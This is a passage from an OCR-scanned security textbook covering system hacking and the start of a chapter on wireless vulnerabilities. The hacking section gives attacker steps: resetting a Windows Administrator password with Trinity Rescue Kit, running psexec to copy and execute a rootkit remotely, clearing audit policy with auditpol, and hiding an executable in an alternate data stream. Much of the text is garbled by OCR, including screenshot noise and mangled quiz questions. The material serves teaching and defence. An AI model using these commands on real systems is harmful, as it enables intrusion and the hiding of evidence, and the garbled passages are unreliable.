Sa EX] 1X1 1X1 1X3 1 31 II 31 ] I 31 3E ] I II 31 ] I 31 )I 1 EX] IXJ IX) EX1 IX 1 IX) 1X1

PgUp to view or/and change account parameters

1999-2BB5 (C)

Press V to save changes and exit cr Esc
Active Data Recovery Software

to sxii with uul saving

1 78 PART 2 A Technical Overview of Hacking

fictiuet* Password Changer u.J.Q [build BZ77D
tlssr s Rccaunt poriweters :
HS SAH Database: CD 3 ( 1 )<UlH2K>sU] HMTsSYSTEM32^C0NF IG\s*m
Fill l Mane : ‘Karat I ne White

Descr 1 pt Ion : “Met work systems engineer CTT iepartHeut J ”
Existing: nhcmgr tn:

t 1 I 1 User Must change password ai next logon

[ 1 [ I Ate aunt is disabled

C ] [ I h. juuii! \u Luufcuil u u I

■ X Clear this User’s Password

PgDn to i^icN or /and change permitted logon hours

FIGURE 7-4

List of accounts.

i’njss V Id sa*je changes and exit or Esc to ex i I without sauinu;

liter ‘ s atlrifauEes has been succesfu I Jy changed . H’ress any km,*. J

1999-2605 <C> Act iue Data Recouero SoltHare

nhh . pa ssMor d -changer, com

Trinity Rescue Kit

Trinity Rescue Kit (TRK) is a Linux distribution that is
specifically designed to be run from a CD or flash drive. TRK
was lLus i Liti Lui ii« rwuw r and repair h ot h Windows and Linux
systems that were otherwise un boo table or unrecoverable.
While TRK was designed for benevolent purposes, it can
easily be used to escalate privileges by resetting passwords

TRK can he usml to chaniie a password ny running ike
target system off of a CD or flash drive and entering the TRK
environment. Once in the environment, a simple sequence of
commands can be executed to res el the password of an account
The following steps change the password of the Administrator account on a Windows
system using the TRK:

1. At the command line enter the following command:
• The winpass command will then display a message similar to the following:
Searching and mounting all file system on local machine
Windows NT/2K/XP installation s) found in:

• 1: /hdal /Windows
Make your choice or ” q 1 to quit [1]:

Type 1 or the number of the location of the Windows folder if more than one
install exists.

NOTE

The TRK can be used as a follow-on
tool to the enumeration techniques
discussed earlier. It works best
when you know the name of
the account to be changed, The
enumeration techniques shown
previously allow you to browse
the accounts on a system and
select a target account.

CHAPTER 7 En time ration and C omputer System Hacking

179

1. Press Enter.
• Enter the new password or accept TRK’s .suggestion to set the password to ei blank,

• You will see this message; -t Do you really wish to change it?” Enter Y and press
Enter,

• Type in it 0 to shut down the TRK Linux system .

• Reboot,

• As you can see, it is possible to change the password of a specific account using TRK
in a few steps.

Escalating privileges gives the attacker the ability to perform actions on the system
with fewer restrictions and perform tasks that are potentially more damaging. If an
altacker gains higher privileges than he or she would have otherwise, it is possible to
run applications, perform certain operations, and engage in other actions that have
a bigger impact on the system.

Planting Backdoors

The next step after escalating privileges is to place backdoors on the system so you
can come back later and take control of the system repeatedly. An attacker who places
a backdoor on a system can use it for all sorts of reasons, depending on specific goals,
Some of the reasons for planting backdoors include the following:

• Placing a rootkit
■ Executing a Trojan

Of course, the question is how to get a backdoor on a system, With the escalated privileges
obtained earlier, you have the power to run an application on a system and do so more
freely than you would without such privileges. If the privileges obtained previously were
administrator (or equivalent), you now have few if any limitations, which means that
you can install a backdoor quite easily.

To start the process, you must first run an tip plication remotely. Several tools are
available, but for this discussion you will use some of the components of a suite of tools
known as PsTools,

1 FYI h

PsTools is a suite of tools designed by Mark Rjssinovich of Microsoft. The PsTools suite was
originally designed for Windows NT systems, but has Continued to serve a useful purpose in
later versions. PsTools contains applications designed to do everything from running commands
remotely to terminating processes, as well as a number of other functions. All the applications
that make up the PsTools suite are command line-based and offer the ability to be customized
by the use of switches.

180 PA RT 2 A Tech n i ca I Overview of H ack i n g

Using PsTools

The PsTooIs suite includes a mixed bag of utilities designed to ease system administration.
Among these tools is PsExec. which is designed to run commands interactively or nonin-
teractively on a remote system. Initially, the tool may seem similar I o Telnet or remote
desktop, but does not require installation on the local or remote system in order to work.
PsExec need only be copied to a folder on the local system and run with the appropriate
switches to work.

Let’s take a look at some of the commands that can be used with PsExec:

• The fol low i n g c o m mand la un c h es a n internet] ve c i ) m m a n d prom pt
on a system named Wzelda:

psexec Wzelda cmd

• This command executes IpConfig on the remote system with the /all switch ,
and displays the resulting output locally:

psexec Wzelda ipconfig /all

» This command copies the program rootkit.exe to the remote system and
executes it interactively:

psexec Wzelda – c rootkit.exe

• This command copies the program rootkit.exe to the remote system and
executes it interactively using the administrator account on the remote system:

psexec Wzelda -u administrator -c rootkit.exe

As these commands illustrate, it is possible for an attacker to run an application on a remote
system quite easily The next step is for the attacker to decide just what to do or what to run
on the remote system. Some of the common choices are Trojans, rootkits. or backdoors.

Rootkits

A rootkit Is piece of software designed to perform some very powerful and unique tasks
to a target system. This software is designed to alter system iiles and utilities on a victim’s
system with the intention of changing the way a system behaves. Additionally, a rootkit
quite commonly has the capability to hide itself from detection, which makes the device
quite dangerous.

A rootkit is beneficial to an attacker for a number of reasons, but the biggest benefit is
the scope of access the attacker can gain. With a rootkit installed on a system, attackers
gain root access to a system, which means that they now have the highest level of access
possible on the target system. Once attackers have a rootkit installed, they effectively own
the system and can get it to do whatever they want. In fact, a rootkit can be embedded
into a system so deeply and with such high levels of access that even the system admin-
istrator will be unable to detect its presence. I laving root access to a system allows an
attacker to do any of the following:

CHAPTER7 En time ration and C omputer System Hacking

181

Sony’s Rootkit Problem

One of the more famous rootklts was produced by Sony BMG in 2005 as a way to enforce
Digital Rights Management (DRMJ on its music. The software was shipped on the CDs of some
of Sony’s popular artists. When the CD was placed into a computer using Microsoft Windows,
the software would install on the system and prevent copying of music. The biggest downside
to this software was that it had no protection, so an attacker who knew the software was
present or knew how to scan for it could connect to and take control of a victim’s system.

This rootkit case had a lot of fallout for Sony and the computing public at large. Sony was
embarrassed by the publicity and ultimately was on the losing side of a class action lawsuit.
Additionally,, as a result of this problem, the public became aware of the threat of rootkit
and learned to be more cautious.

Sony’s rootkit episode also attracted hackers to write new worms designed to pounce
on the vulnerabilities that the rootkit induced on a system.

Installing a virus at any point — If the virus requires root Level access to modify
system liles, or alter and corrupt data or files, a root kit can provide the means to do so

Placing a Trojan on a system — Much like viruses, a Trojan may require root level
access, so a rootkit will provide the level of etc cess needed to run these types
of malware.

Installing spyware to track activity — Spy ware typically lu^ds to be well placed
and well hidden. A rootkit can provide a way to hide spyware such as a key logger
so it is undetectable even to those looking for it.

Hiding the attack — A rootkit possesses the ability to alter the behavior of a system
any way an attacker wants, so it can be used to hide evidence of an attack. A rootkit
can be used to hide files and processes from view by altering system commands
to prevent the display or detection of the attEick.

• Maintaining access over the long term — If a rootkit can stay
undetected, it is easy for an attacker to maintain access to the
system. For an attacker* the challenge is to construct a rootkit
to prevent detection by the owner of the system.

• Monitoring network traffic — A rootkit can install a network
sniffer on a system to gain inside in form tit ion about the
activities on a network.

Blocking the logging of selected events — To prevent
detection, a rootkit can atter the system to prevent the
logging of activities related to a rootkit

Redirecting output — A rootkit can be configured to redirect
output of commands and other activities to another system.

NOTE

Rootkits are dangerous
because once a system has
become ‘.he victim of a rootkit,
it can no fonger be trusted.
A rootkit alters the behavior
of a system to such a degree
that the information being
returned by the system itself
has to be considered bogus.

182 PART 2 A Technical Overview of Hacking

NOTE

Rootkits are a form of what is
known as malware, which includes
software such as viruses, worms,
spyware, and other related
miscreants.

Above alL a rootkit is an Explication and as such can
be run with a lool such PsLxec and run remotely on a target
system . Of course, running a rootkit is one thing: obtaining
one is quite another, Currently there exist many ways
to get a rootkit — whether it is from a Web site or through
a development tool designed to help nonprogrammers
create basic root kits.

Covering Tracks

NOTE

An attack that can be detected is an attack that can be stopped, which is not a good result
for an attacker To stop an attack from heing detected, attackers need to cover their tracks
as completely and effectively as possible. Covering tracks needs to be a systematic process
in which any evidence of the attack is erased lo include logons, log files, error messages,
files, and any other evidence that may tip off the owner of the system thai something
has occurred.

Disabling Auditing

One of l he best ways to cover your tracks is to not leave any in the iirsl place. In this case,
disabling auditing is a way to do Just that. Auditing is designed to allow the detection
and tracking of events that are occurring on a system. If auditing is disabled, an attacker
can deprive the system owner of delecting the activities tliEit have heen carried out.
When auditing is enabled, all events that the system owner chooses to track to will be
placed in the Windows Security Log and can be viewed as needed. An attacker can
disable it with the auditpol command included with Windows,

Using the NULL session technique seen earlier, you can
attach to a svsteni remotely and run the command as follows:

A prepared defender of a system
will regularly check event logs
to note any unusual activity
such as a change in audit policy.
intrusion detection system (IDS)
will detect changes in audit policy
and in some cases re-enable it.

auditpol \<ip address of target> /cleai

It is also possible for an attacker to perform what amounts
lo the surgical removal of entries in the Windows Security
Log using tools such as the following:

• Dumpel

• Elsave

■ WinzEipper

Of course, clearing audit logs isn’t the only way to clear tracks hecause attackers can use
rootkits. Using techniques that will be discussed later, you can thwart rootkits to a certain
degree, but once rootkits make their way onto a system, sometimes the only reliable way
to ensure that a system is free of them is to rebuild that system.

CHAPTER 7 En time ration and C omputer System Hacking

183

NOTE

NTFS volumes, although the
version of NTFS does not
matter. This feature does not
work on other file systems.

Data Hiding

There are other ways to hide evidence of an attack, such as hiding the files placed on the
system. Operating systems provide many methods that can be used to hide files, including
file attributes and alternate data streams.

File attributes are a feature of opertiting systems that allow files to be marked as having
certain properties, including read-only and hidden. Files can be flagged as hidden, making
for a convenient way of hiding data and preventing detection through simple means such
as directory listings or browsing in Windows Explorer. Hiding files in this way does not
provide complete protection, however, because more advanced detective techniques
can uncover files hidden in this manner.

Another lesser known way of hiding files in Windows is Alternate
Data Streams (ADS), which is a feature of the New Technology
File System {NTFS). Originally, this feature was designed to ensure
interoperability with the Macintosh Hierarchical File System (HPS),
but has since been used by hackers. ADS provides the ability to fork
or hide Eile delta within existing iiles without altering the appearance
or behavior of a file in any way. In fact, when ADS is used, a file can
be hidden from all traditional detection techniques as well as dir
and Windows Explorer.

In practice, the use of ADS is a major security issue because it is nearly a perfect
mechanism for hiding data. Once a piece of data is embedded using ADS and is hidden,
it can lie in wait until the attacker decides to run it I Liter on.

The process of creating an ADS is simple:

type ninja.exe > smoke , doc : ninja .exe

Executing this command will take the file ninja.exe and hide it behind the lile smoke.doc.
At this point, the iile is streamed. The next step would be to delete the original file that
you just hid, specifically ninja.exe.

As an attacker, to retrieve the file the process is as simple as the following:

start smoke .doc: ninja.exe

This command has the effect of opening the hidden file and executing it.

As a defender, this sounds like bad news because files hidden in this way are impossible
to detect using most means. But with the use of some advanced methods they can be
detected. Some of the tools that can be used to do this include:

Sfind — A forensic tool for finding streamed files
■ LNS — Used for finding ADS si reamed iiles

• Tripwire — Used to detect changes in files, this tool by nature can detect ADS

Depending on the version of Windows and the system settings in place, an attacker
can clear events completely from an event log or remove individual events.

184

PART 2 A Technical Overview of Hacking

(A

SEE

■-

CHAPTER SUMMARY

Enumeration is the process of gathering more detailed information from a target
system. Whereas previous information has been gathered without disturbing the
target, with enumeration the target is being Interacted with, and more detailed
itiformaticm i* bciny rtM uni^d. hifbrmutmri ex tr tic [ed from u target n\ thus point
Includes usernames, group information, share 1 names, and other details.

Once the attacker has completed enumeration, he or she begins system hacking.
In the system hacking phase, the attacker starts to use the Information gathered
from the enumeration stage by hacking the services, This stage represents the point
at which the attacker is compromising the system.

An attacker who wants to perform more aggressive actions or needs greater access
can perform a process known as privilege escalation. In this stage, the attacker gains
access to a user account or system and attempts to grant it more access than it
would otherwise have by resetting passwords of accounts that have more access
or installing software that grants this level of access.

Finally, the attackers cover up their tracks to avoid detection and action by
possible counter measures. They can stop auditing, clear event logs, or surgically
remove events from the logs to make things look less suspicious. In this last phase,
attackers eliminate the traces of their attack lis completely as possible leaving
few (If any ) behind.

KEY CONCEPTS AND TERMS

Backdoor

Rootkit

Enumeration
Keylogger

Security Account Manager

(SAM)

Simple Network Management

NULt session
Privilege escalation
Rainbow table

Protocol (SNMP)
Spy ware
Virus

CHAPTER? Enurne ration a nd Computer System Hacking

185

CHAPTER 7 ASSESSMENT

1. Enumeration discovers which ports are open,

A. True
14, False

1. What can Enumeration discover?

A, Services

B, User accounts

C, Forts

D, Shares

1. involves increasing access

on a system,

A. System hacking

B, Privilege escalation
C En timer ati on

1. liuckdoor

Is the process of exploiting

services on a system.

A, System hacking

B, Privilege escalation

C, Enumeration

D, Backdoor

1. How are brute-force attacks performed?

A. By trying all possible combinations
of characters

B, By trying dictionary words
C By capturing hashes

11 By comparing hashes

1. A

Is an offline attack.

A. Cracking attack

B. Rainbow attack

C. Uirl Inlay iitlack
11 Hashing attack

1. An attacker can use a| n)
to a system.

LM I • I. ,

fi. A

replaces and alters system

files, changing the way a system behaves
at a fundamental level.

A. Kootklt
li. Virus

C. Worm

D, Trojan

1. A NLLL session is used to attach
to Windows remotely,

A. True

B. False

1. Ain)
• A

• is used to reveal passwords.

is used to store a password.

A. NULL session

B. Hash

C. Rainbow table;

\1 RoOLktl

12, A

is a file used to store passwords.

A. Network

B. SAM

C. Database
ll NetBIOS

Wireless Vulnerabilities

WIRELESS COMMUNICATION and networking technologies have seen
consumers have adopted wireless technologies for their ability to allow
taken to the technology because it can allow connections to computers in areas
where wires cannot reach or would be expensive to install. Wireless has become
one of the most widely used technologies by both consumers and businesses
and will most likely continue to be so.

While wireless offers many benefits, one of the concerns of the technology Is
security. Wireless technologies have many security issues that must be addressed
by the security professional. The technology has traditionally suffered from poor
or even ignored security features by those who either adopted the technology
too quickly or didn’t take the time to understand the issues, Those organizations
that did take the initiative in a lot of cases went too far, opting to ban the use
of the technology instead of finding out how to secure the technology.

This chapter explores how to use wireless technology In the organization,
to reap its benefits but do so securely. Like any technology, wireless can be
used safely; it is only a matter of understanding the tools available to make
the system secure. For example, we can leverage techniques such as encryption
and authentication together with other features designed to make the system
stronger and more appealing to the business. With the right know-how and
some work, wireless can be secured; the technology needn’t be banned.

Chapter 8 Topics

This chapter covers the following topics and concepts:

Why wireless security is important

• What the history of wireless technologies is
• How to work with and secure Bluetooth

• How to work with wireless local area networks (WLANs)

• What the threats to Wireless LANs are
• What wireless hacking tools are

• ■ How to protect wireless networks

Chapter 8 Goals

When you complete this chapter, you will be able to:

• Explain the significance of wireless security
• Understand the reasons behind wireless security

• Describe the history of wireless

• ■ Understand security issues with cordless phones, satellite TV r and cell phones

■ See how Bluetooth works

• Understand security issues with Bluetooth

■ Detail wireless LANs and how they work

• Describe threats to Wireless LANs
List types of wireless hacking tools
• Understand how to defend wireless networks

• The Importance of Wireless Security

Wireless technologies have been adopted rapidly over the last decade, but security for
those networks has not. As individuals and organizations looked to adopt the technology,
security was dealt with in a number of different ways: either by not adopting security
measures at all in some cases or by blocking the use of the technology in others. Both
cases represent extremes that need not be used because wireless can be secured safely
if the security vulnerabilities and issues involved are known.

Wireless networks have a number of vulnerabilities that must be understood before
they can be properly dealt w r ith.

188 PART 2 A Technical Overview of Hacking

NOTE

Except for fiber optic media,, all
networks are subject to emanations
in the form of electromagnetic
radiation, in the case of copper cables,
this emanation is a result of electrical
charges flowing through the media
and generating a field

Emanations

One of the traits of wireless networks is the way they work
This is both a strength and a weakness because it allows
wireless transmissions to reach out in all directions, enabling
connectivity but also allowing anyone in those directions
to eavesdrop. As opposed to the transmission of signals in
traditional media such as copper or fiber, where someone
musl bv on l h v “win. 1 ” lo listen, wireless LravvJs through [he
air and can easily be picked up by anyone with a device as
simple as a notebook with a wireless card. This leads to a huge administrative and security
headache and it immediately makes clear the need for additional security measures.

Emanations of a wireless network can be affected by a number of different factors
that make the transmission go farther or shorter distances, including the following:

NOTE

on the same or related frequencies
can interfere with wireless networks
in some form. By extension, anything
that affects the atmosphere that the
signals are traveling through will
cause interference. However it is also
of note that interference does not
mean that a network will be offline.
Interference can manifest itself as
low or poor performing networks.

Atmospheric conditions — Warm or cold weather
will affect how far a signal will go due to the changes
in air density that changing temperatures cause.

Building materials — Materials surrounding an access
point (AP) such as metal, brick, or stone will impede
a wireless signal.

Nearby d evices — Other devices in the area (tor example,
microwaves and cell phones) that give off RF signals or
generate strong magnetic fields can affect emanations.

Common Support and Availability

Wireless networks have become more and more common
over Liu 1 I li si lew \v;irs. bcinii shipper in ;>ll it.liii jkt ol
devices and gadgets. From the early 2000s up to the current day, wireless technologies
in the form of Bluetooth and Wi-Fi have become more common h with both features
going from being an option to being standard equipment in notebooks and netbooks.
This increased support of wireless technology can be seen even in cell phones, in which
Bluetooth support became standard with Wi-Fi support following closely behind on
the standard feature list of devices.

FY!

Consider how ubiquitous Bluetooth support is in cell phones alone. A company that wants to
eliminate the use of Bluetooth would have a monumental task on its hands because just about
all cell phones include this feature. In fact, in some high-security areas, employees have been
forced to purchase used cell phones from years ago or go without cell phones while at work.

CHAPTER 8 Wireless Vulnerabilities

189

What Is Wi-Fi?

Wi-Fi is a trademark introduced in 1999 and owned by the Wi-Fi Alliance that is used to
brand wireless technologies that conform to the 802.11 standard. For a product to bear the
Wi-Fi logo, it must pass testing procedures to ensure it meets 802.11 standards. The Wi-Fi
program was introduced due to the widespread problems of interoperability that plagued
early wireless devices. Wi-Fi is commonly used to refer to wireless networking much as the
name Coke is used to refer to any soft drink, but just because a device uses the 802.11
standard does not mean it is Wi-Fi (it may not have undergone testing).

harder for the network and security administrator. With so many devices implementing
wireless, it is now more possible that an employee of a company could bring in a wire less-
en ah led laptop or other device and attach it to the network without the knowledge of an
administrator In some situations, employees have decided that a company IT department
that has said -t Ko wireless” is just being unreasonable and, oblivious to the security risks,
have taken it upon themselves to install a wireless AP.

A Brief History of Wireless Technologies

Wireless technologies aren’t anything new; in fact, wireless has been around for more
than a decade for networks and even longer for devices such as cordless phones. The
first wireless networks debuted in the mid-1990s wttJi educational institutions, large
businesses, and ernmenls lis earh, adopters, TJii’ curly networks did not resemble
the networks in use today because they were mainly proprietary and performed poorly
compared with today s deployments,

In today’s environment, the business or consumer looking to purchase a wireless
networking technology will encounter a large selection of options. Among them is the
Institute of Electrical and Electronics Engineers {IEEE l 802.11 family of standards, which
range from 802.11a to 802. lln. They are known collectively as Wi-Fi in standard jargon.
In addition to the S02. 1 ] family of wireless standards, other wireless technologies have
emerged {Bluetooth, tor example), each purporting to offer something unique.

When looking at wireless networking it is easy to think of it as one standard, but this
is not the case. Wireless networks have evolved into a family of standards over time; each
includes unique attributes, To understand wireless, it is worth looking at the different
standards and their benelits and performance. The following sections discuss the wireless
standards that have been or are in use.

190 PART 2 A Technical Overview of Hacking

802.11

The 80.2.11 standard was the first wireless standard that saw any major usage out side
of proprietary or custom deployments, Tt was used mainly by large companies and
educational institutions that could afford the equipment, training, and implementation
costs. One of the biggest problems with 802,11 that led to limited usage was performance.
The maximum bandwidth was theoretically 2 megabytes per second (Mbps), in practice,
it reached at best only half this speed. The 802.11 standard was introduced in 1997
and saw limited usage, but quickly disappeared*
Its features included:

• Bandwidth — 2 Mbps
• Frequency — 2 ,4 CAva (gigahertz)

• 802.11b

The first widely adopted wireless technology was S02,llb, introduced two years after
the original 802.11 standard. It didn’t take too long to be adopted by businesses and
consumers alike. The most attractive feature of this standard is performance: 802,11b
increased performance up to a theoretical 11 Mbps, which translated to a real-world
speed of 6-7 Mbps, Other attractive features of the standard include low cost for the
consumer and for the product manufacturer.

fts features include:

GTE

302.11b is being rapidly replaced
in favor of 802. 1 1 g and n, but
It is still very widely used and
supported, with most notebooks
still supporting the technology
off the shelf and 802,11b APs
still available.

• Bandwidth — 11 Mbps
• Frequency — 2 .4 Ghz

• One downside of 802,11b is Interference. 802,11b has
a frequency of 2,4 Chz h the same frequency as other
devices such as cordless phones and game controllers,
so these devices can interfere with 802.11b, Additionally
interference can be caused by home appliances such as
microwiivi 1 ovens.

802.11a

When 802. lib was being developed, another standard was created in parallel: 802.11a,
It debuted around the same time as 802.11b. but never saw widespread adoption due
to its high cost and lesser range. One of the largest stumbling blocks that hampered its
adoption was equipment prices, so the alternative 802.11b was implemented much
more quickly and is seen in more places than 802. 11a, Tothiy M02. 1 1 a is rarely seen.

The 802.11a standard did offer some benefits over 802,11b, notably much g re titer
bandwidth: 54 Mbps over 802. li b’s 11 Mbps. Also, 802.11a offers a higher frequency
range [ S C hz)< which means less chance for interference because fewer devices operate
in this range. Equally the signaling of 8(32. 11a prevents the signal from penetrating
walls or other materials, allowing it to be somewhat easily contained.

CHAPTER 8 Wireless Vulnerabilities

191

FYlj— |

Atone point 802.11a was widely used by businesses due to the performance, -cost, and security
benefits. The business world adopted wireless primarily because of its better performance and
their bigger budgets. Businesses also found a unique benefit in the ability to contain the signal
with standard building materials. However, today’s world has seen the replacement of 802.11a
with 802. 11 g and 802.11 n networks supplemented with appropriate security technologies.

The S02.ll a standard is not compatible with 802, lib or tiny other standard due to the
way it is designed. APs that support 80 2, 11 a and other standards simply have internals
that support both standards.

Its features include:

1 1 a n d w idt h — S 4 M bp s
■ Frequency — 5 Chz

802 Jig

In response to consumer and business demands for higher performance, wireless
networks 802. 11 g emerged. The 8 02. 11 g standtird is a technology that combines the
best of both worlds {H02.ll a and 802.11b). The most compelling feature of 802. 11 g
is the higher bandwidth of 54 Mbps combined with the 2.4 Ghz
frequency, This allou s lor y real cr mn^e and hacku’ard compii Utility
with 802.11b (but not 802,11a}. In fact, wireless network adapters
that use the 802.11b standard are compatible with 802.11 gAPs,
which allowed many business and users to migrate more quickly
to the new technology.
Its features include:

NOTE

Some networks that identify
themselves as 802.11b are
actually 802, 11 g networks
and are being identified as
otherwise by a wireless card
that is not aware of S02.11g.

• Bandwidth — 54 Mbps

• Frequency — 2 . 4 G h z

802.11 n

Currently emerging in the marketplace of wireless technologies is 802,110, which increased
the amount of bandwidth that was available in previous technologies up to 600 Mbps in
some contigu rat ions. The 802. 11 n standard uses a new method of transmitting signals
known as multiple input and multiple output (MIM0). which can iransmit multiple signals
across multiple antennas. The 80 2. 11 n standard offers backward compal ihilMy u’tih
80 2. 11 g, so it will encourage adoption of the technology by consumers.
Its features include:

• Ban d w idt h — Up to BOO M h p s
• Frequency — 2.4 Ghz

• 192

P A RT 2 A Tech nical Overview of H ack i ng

What’s in a Name?

Tlie name Bfu&taoth may seem odd, but it does have reasoning behind it. Bluetooth got
its name from a Danish Viking king named Harald Bi at land. In the tenth century, Blatland
united all of Denmark and Norway under his rule, much as Bluetooth unites different
technologies wireiessly. Why the name Bluetooth? King Harald apparently liked wild
blueberries, which stained his teeth — leading people to call him fJ Bluetooth/’

Other Wireless Technologies

While wireless networking in the form of 802,11 is probably the best known by
the Ei vera ge consumer, other wireless technologies are in widespread use, including
Bluetooth and WiMax.

Bluetooth

Bluetooth is a technology that emerged for the first lime in 1998. From the beginning.
Bluetooth was designed to be a short-r tinge networking technology that could connect
different devices together. The technology offers neither the performance nor the range
of some other technologies, but its intention wasn’t to connect devices over long distances,
Bluetooth was intended to be a connectivity technology that could allow devices to talk
over a distance of no more than 10 meters with low bandwidth requirements. While the
bandwidth may seem low, consider the fact that the technology is used to connect devices
that do not need massive blind width like headsets and personal digital assistants (PDAs).
Bluetooth falls into the category of technologies known as Personal Area Networking (PAN).

WiMax

A Jut wireless tee hnoJogy thai has emerged over l be last leu years
is WiMax. WiMax is similar in concept to Wi-Fi, but uses different
technologies. WiMax is specifically designed to deliver Internet access
over the so-called last mile to homes or businesses that may not
otherwise be able to get access. In theory, WiMax can cover distances
up to 30 miles, but in practice ranges of 10 miles are more likely.
The technology was not designed for local area networks; it would
fall into the category of Metropolitan Area Networking (MAN).

[■ NOTE

a technology to cover some
metropolitan areas with
wireless access in an effort
to offer free Internet access
to the masses.

Working with and Securing Bluetooth

Bluetooth emerged as a concept in the mid-1990s as a way to reduce the wires and cables
that cluttered offices and other environments. In 1998, the Bluetooth Special Interest
Group (SIG) was created to develop the concept known as Bluetooth and to speed Us

CHAPTER 8 Wireless Vulnerabilities

193

Eid option among the public. The founders of this group included technology giants
such as [BM. Intel, Nokia* Toshiba, and Ericsson. After the standard was implemented,
manufacturers rapidly started manufacturing all sorts of Bluetooth devices — everything
from mice to keyboards to printers showed up on the market* all Bluetooth emibled,
Whcit makes the technology so attractive is its flexibility. Bluetooth has been used
in numerous applications including:

■ Connections between celt phones and hands-free headsets and earpieces

• Low bandwidth network applications

• Wireless PC input and output devices such as mice and keyboards

■ Data transfer applications

• GPS connections

• Bar code scanners

• A replacement for infrared

• A supplement to universal serial bus (USB) applications

• Wireless bridging

• Video game consoles

• Wireless modems

Bluetooth has worked very well to link together devices wirelessly, but the technology
has problems with security, Bluetooth does, however* support techniques that enforce
security to make using enabled devices less vulnerable,

Bluetooth Security

Bluetooth technology was designed to include some security measures to make the
technology safer. Each mechanism that is employed can be part of a solution to make
using the technology acceptable to individuals and businesses.

Trusted Devices

Bluetooth employs security mechanisms called ‘”trusted devices,” which have the ability
to exchange data without asking any permission because they are already trusted to do so.

t \

Bluetooth Everywhere

The victims of Bluetooth attacks aren’t just computers, cell phones, and PDAs; they can
be any type of Bluetooth-enabled system s uch as a car stereo. A new piece of software
known as the Car Whisperer, for instance, allows an attacker to send and receive audio
from a Bluetooth-enabled car stereo. As with any technology, the attacks will come along
with every new innovation and upgrade. Device manufacturers try to anticipate every
problem, but unfortunately they may be left doing firmware updates and patches later.

194 PART 2 A Technical Overview of Hacking

Willi trusted devices in use, any device that is not trusted will automatically prompt
the user to decide whether to allow the connection or not.

A device thai is trusted in I his system should adhere to certain guidelines. It should be:

• A personal device that you own such as a cell phone, PDA, media player,
or other similar device
• A device owned by the company and identified as such. These devices
could include printers, PDAs, or similar types of devices,

• An un trusted device is deiined as follows:

• A device that is not under the immediate control of an individual or company

is questionable. Devices that fall in this category are any public devices for which
you cannot readily identify the owner nor trust the owner.

The idea behind trusted devices is that unknown devices are not allowed to connect
without being explicitly approved. If an unt rusted device were allowed to connect
without being Eip proved, it could mean that a device could accidentally or maliciously

When working with Bluetooth-enabled devices, take special care to attach only
to devices you know. Users should be taught to avoid attaching to devices that they
do not know r and cannot trust. Impress upon users the difference between trusted
and un trusted devices when making connections. Stress that unsolicited connection
requests should never be accepted

Discoverable Devices

In an effort to make Bluetooth devices easy to configure and pair with ot her devices,
the discoverability feature w T as added to the product. When Bluetooth devices are set
to be discoverable, they can be seen or discovered by other Bluetooth devices that are
in range. The problem with a device being set to be discoverable is thai It can be seen
by the owners of devices who have both good and bad Intent ions. In fact, a discoverable
device could allow an attacker to attach to a Bluetooth device undetected and swipe
data off of it quite easily.

Device manufacturers such as those who make cell phones are known to set their devices
to be discoverable by default. The idea behind having it as the default mode is that the
device is easier for the consumer to use right out of the box. The security issue is that
a consumer may not be aware of the security risks and leave this feature enabled.

Discoverability should be enabled only to pair devices and then be disabled afterward.
Tnis is a technique that newer models of these devices are starting to use.

CHAPTER 8 Wireless Vulnerabilities

195

Bluetooth hacking may seem like less of a problem because the range of the technology is only
about 10 meters. But with most things in technology and security, there is always a work-around,
and Bluetooths range is. no different. A 2004 article published in Popular Science (and available
on its Web site} titled “Bluetooth a Mile Away/’ discussed how to extend Bluetooths range
substantially. The article showed how to modify simple, off-the-shelf components to boost
the reach of Bluetooth way beyond what is specified, all for a price tag of less than $70. A simple exercise like this shows just how an attacker can change the nature of the ” game ” in creative ways. Attackers used to have to be in close proximity to the victim, but now they can be much farther away. It is getting less common to find devices set with their default mode of operation to be discoverable. But don’t take anything ibr granted. When issuing cell phones to employees, always check to make sure that the device is set to be nondiscoverable unless absolutely necessary. Bluejacking r Bluesnarfing, and Bluebugging Bluejacking. Bluesnarimg* and Bluebugging are attacks caused by devices being discov- erable. Bluejacking involves a Bluetooth user transmitting a business card, a form of text message, to another Bluetooth user, If the recipient doesnt realize what the message is, he or she may allow the contact to be added to their address book. After that, the sender becomes a trusted user. For example. Bluejacking allows someone authorized or unauthorized to send messages to a cell phone. The other threat posed by discoverability is Bluesnarfing. which is used to steal data from a phone, Bluebugging is an attack in which attackers can use the device being attacked for more than accessing data: they can use the services of the device for purposes such as making calls or sending text messages. Viruses and Malware An issue that was not initially addressed when Bluetooth debuted was viruses. Viruses were already a well-known fact of life in the computer world, but there really was not much done in Bluetooth to address viruses being spread. Early viruses leveraged the discoverability feature to locate and infect nearby devices with a malicious pay load. Nowadays h most cell phones tend to use connections that require the sender to be authen- ticated and authorized prior to accepting any data, which severely curtails the capability of an unknown device to spread an infection. With the technology the way it stands now, a user must agree to open a lile and install it — diminishing the potential threat, but not eliminating it. NOTE Never underestimate the creativity and ambition of an attacker or virus writer. They thrive in adapting their methods to leverage new technologies and devices, and wireless is no different. When Bluetooth debuted, no security was provided because no manufacturer perceived a threat; this opened the door to some notable attacks later. 196 PART 2 A Technics I Overview of Hacking While Bluetooth manufacturers have given us the tools to secure the technology, it is definitely up to us to use them. Manufacturers may or may not enable security features on their devices. MOTE Securing Bluetooth Bluetooth isn’t going away and .shouldn’t be shunned because of a few security issues: the technology can be secure if used carefully. The makers of Bluetooth have given us the tools to use the technology safely, and these tools coupled with a healthy dose of common sense can make all the difference. Discovering Ensure that discoverability on devices is disabled after pairings have been established between devices. In practice, there is no need for discoverability after a pairing has been made so the feature should be shut off unless it’s needed for some other reason. Working with Wireless LANs Wireless LANs are built upon the Hi) 2. 11 family of standards and operate in a similar manner to wired networks. The difference between the two beyond the obvious lack of wires is the fundamental functioning of the network itself. One of the big differences between wired and wireless is the way signals are trans- mitted and received on the network. In networks based on the Ethernet standard (802.. 3), stations transmit their information using what is known as the Carrier Sense Multiple Access with Collision Detection (CSMA/CD) method. Networks that use this method have stations that transmit their information as needed, but collisions are possible when two stations transmit at the same time. To understand the method* think of the way a phone conversation works: Two people can talk and if they happen to talk at the same time, neither will be able to understand what is being said. In this situation, both talkers stop talking and wait to see who is going to talk instead. This is the same method that CSMA/CD uses. In this setup, if two stations transmit at the same lime, a collision takes place and is detected: then both stop and wait for a random period of time before retransmitting. In wireless networks based on the 802,11 standard, the method is a little different h and is called Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA). Networks that use this method “listen” to see whether any other station is trans- mitting before they transmit themselves. This would be like looking both ways before crossing the street. Much as with CSMA/CD, if a station “hears 1 * another station transmitting, it 